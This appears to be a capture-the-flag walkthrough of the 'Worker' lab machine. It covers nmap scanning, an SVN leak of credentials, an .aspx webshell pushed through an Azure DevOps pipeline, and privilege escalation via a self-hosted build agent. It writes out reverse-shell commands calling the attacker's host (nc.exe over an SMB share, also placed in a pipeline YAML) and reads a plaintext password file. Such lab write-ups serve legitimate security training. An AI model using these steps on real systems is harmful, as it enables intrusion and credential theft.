Worker

Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and then identify the services and versions running on them.

The following nmap command scans the full port range of the target quickly and saves the output to a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.203 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane timing template, the fastest one nmap offers. Combined with --min-rate 5000 it can drop packets on a lossy link, so rerun the scan if a port you expect is missing.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allPorts file.

Now that we know which ports are open, let's find out which services and versions are running on them. The following command scans only those ports in depth and saves the result to a file:

nmap -sC -sV -p80,3690,5985 10.10.10.203 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into a file, in this case the targeted file.
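The two-stage workflow above (a fast full-range scan, then a targeted -sC -sV scan of only the ports found) is easy to script. The following bash script is an added example and not part of the original write-up: it saves the first scan in nmap's grepable format (-oG, alongside the -oN file), extracts the open ports with extract_open_ports, and feeds them to the second scan. The output file names and the constructed sample_gnmap content are assumptions made for this example.

```shell
#!/usr/bin/env bash
# Added example: two-stage nmap enumeration (fast sweep, then targeted scan).
# Not from the original write-up. Assumed file names: allPorts.gnmap, allPorts, targeted.
set -euo pipefail

# extract_open_ports FILE
# Reads an nmap grepable (-oG) file and prints the open TCP ports as a
# comma-separated, numerically sorted list, e.g. "80,3690,5985".
extract_open_ports() {
  grep -E '^Host: .*Ports: ' "$1" \
    | sed 's/.*Ports: //' \
    | tr ',' '\n' \
    | awk -F/ '$2 == "open" {print $1}' \
    | tr -d ' ' \
    | sort -n -u \
    | paste -sd, -
}

# sample_gnmap
# Constructed sample of what nmap -oG writes for this box (not a real capture);
# the ports match the ones found in the write-up.
sample_gnmap() {
  printf '# Nmap 7.91 scan initiated as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.203 -oG allPorts.gnmap\n'
  printf 'Host: 10.10.10.203 ()\tPorts: 80/open/tcp//http///, 3690/open/tcp//svn///, 5985/open/tcp//wsman///\tIgnored State: filtered (65532)\n'
  printf '# Nmap done: 1 IP address (1 host up) scanned\n'
}

# run_scan TARGET
# Stage 1: fast SYN sweep of all ports, written both as grepable and normal output.
# Stage 2: default scripts and version detection on the open ports only.
run_scan() {
  local target="$1" ports
  nmap -sS --min-rate 5000 -p- -T5 -Pn -n "$target" -oG allPorts.gnmap -oN allPorts
  ports="$(extract_open_ports allPorts.gnmap)"
  if [ -z "$ports" ]; then
    echo "[!] no open ports found on $target (rerun with a lower rate?)" >&2
    return 1
  fi
  echo "[*] open ports on $target: $ports"
  nmap -sC -sV -p"$ports" "$target" -oN targeted
}

# Only touch the network when explicitly asked: ./scan.sh --run 10.10.10.203
if [ "${1:-}" = "--run" ]; then
  run_scan "${2:-10.10.10.203}"
fi
```

Without --run the script only defines the functions, so you can source it and call extract_open_ports against an existing .gnmap file from a previous sweep.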

Three ports are open: 80 (HTTP), 3690 (Subversion) and 5985 (WinRM). Browsing to port 80 only shows the default IIS page.

Since port 3690 is open, let's enumerate the Subversion server by listing the repository root:

svn ls svn://10.10.10.203

The repository is not empty, so let's check its contents out:

svn checkout svn://10.10.10.203

Our current directory now contains the dimension.worker.htb directory and the moved.txt file. Let's take a look at that file:

cat moved.txt

Now that we know a few domain names, let's add them to the /etc/hosts file so they resolve to 10.10.10.203:

nano /etc/hosts

We can also list the commit history:

svn log svn://10.10.10.203

All commits were made by the user nathen. Let's update the working copy to revision 2 to see what that commit contained (run this inside the checked-out directory):

svn up -r 2

Revision 2 contains the deploy.ps1 file. Let's take a look at it:

cat deploy.ps1

The script contains credentials. Let's take a look at the dimension.worker.htb site and see whether the virtual hosts serve something other than the default IIS page.

Not much going on. Let's take a look now at the devops.worker.htb site.

Let's try to log in with the credentials found in deploy.ps1.

And we are in.

Exploitation

Let's click on the SmartHotel360 project.

From the Repos section we can see one repository per worker.htb subdomain. The idea is to upload an .aspx webshell (cmd.aspx, which you can download from here) to one of the subdomain sites, for example alpha.worker.htb. To do so, select the alpha repository and click on Upload file(s).

Then select the cmd.aspx file and click on Commit.

But we get an error because direct commits to the master branch are not allowed. So let's go back and create a new branch.

Let's call it webshell.

Then, upload the cmd.aspx webshell to the webshell branch.

Then, click on Create a pull request.

And click on Create.

Then, click on Approve.

Now, from the Pipelines section, run the Alpha-CI pipeline and select the webshell branch.

Once the pipeline has finished, the cmd.aspx file is in the master branch and has been deployed, so we can reach it from the browser:

http://alpha.worker.htb/cmd.aspx

Time to get a shell. First, let's set a netcat listener on port 4444.

rlwrap nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Now, let's start an SMB server that shares the directory where the nc.exe binary is located:

impacket-smbserver smbFolder $(pwd) -smb2support

Finally, in the webshell, set the program to cmd.exe and the arguments to the line below. nc.exe is executed straight from our SMB share via its UNC path, and the listener receives a reverse shell as the iis apppool\defaultapppool user.

c:\windows\system32\cmd.exe

/c \\10.10.14.15\smbFolder\nc.exe -e cmd 10.10.14.15 4444

Privilege Escalation

Listing the Users directory suggests that the user flag lives in the home directory of robisl:

dir \users

Next, let's enumerate the logical disks available on the system:

wmic logicaldisk get name

There is an additional W: drive. Let's list it:

dir W:

Inside the svnrepos directory is the file W:\svnrepos\www\conf\passwd, the Subversion password file, which contains many plaintext credentials, including those of the nathen and robisl users:

type W:\svnrepos\www\conf\passwd

Let's try the robisl credentials on the devops.worker.htb site.

Now we see the PartsUnlimited project.

This project only has one repository.

From Project settings > Security we can see that the robisl user is a member of the Build Administrators group, so we can create and run pipelines.

Let's go the Pipelines section, and create a new pipeline.

Then, select the Azure Repos Git option.

Then, select the PartsUnlimited project.

Now, select the Starter pipeline.

Then edit the YAML file: change the pool value to Setup, which is the name of the self-hosted agent pool, and change the script value to a command that sends us a reverse shell.
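As an added example (not the write-up's own file), this is what the starter pipeline looks like after those two edits. The attacker IP, the share name and the nc.exe invocation are reused from the webshell step earlier on the page; the trigger branch is the one the starter template generates.

```yaml
# Added example: azure-pipelines.yml after replacing the hosted pool with the
# self-hosted "Setup" pool and the hello-world step with the reverse shell.
trigger:
- master

# The starter template uses a Microsoft-hosted image here
# (pool: vmImage: 'ubuntu-latest'). Naming the self-hosted pool instead makes
# the job run on the machine's own build agent.
pool: Setup

steps:
# A script step on a Windows agent runs under cmd.exe, so the same UNC-path
# trick used from the webshell works here unchanged.
- script: \\10.10.14.15\smbFolder\nc.exe -e cmd 10.10.14.15 4444
  displayName: 'Reverse shell from the build agent'
```

The script runs with whatever account the agent service uses; on this box that is the account the shell comes back as.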

Make sure the SMB server is still sharing the directory that contains nc.exe, then start another netcat listener on port 4444:

rlwrap nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Click on Save and run, select the Create a new branch for this commit and start a pull request option, and confirm with Save and run.

After a short wait the build agent executes our script and we get a shell as nt authority\system, since the self-hosted agent service runs under that account. All that is left is to grab the root flag.
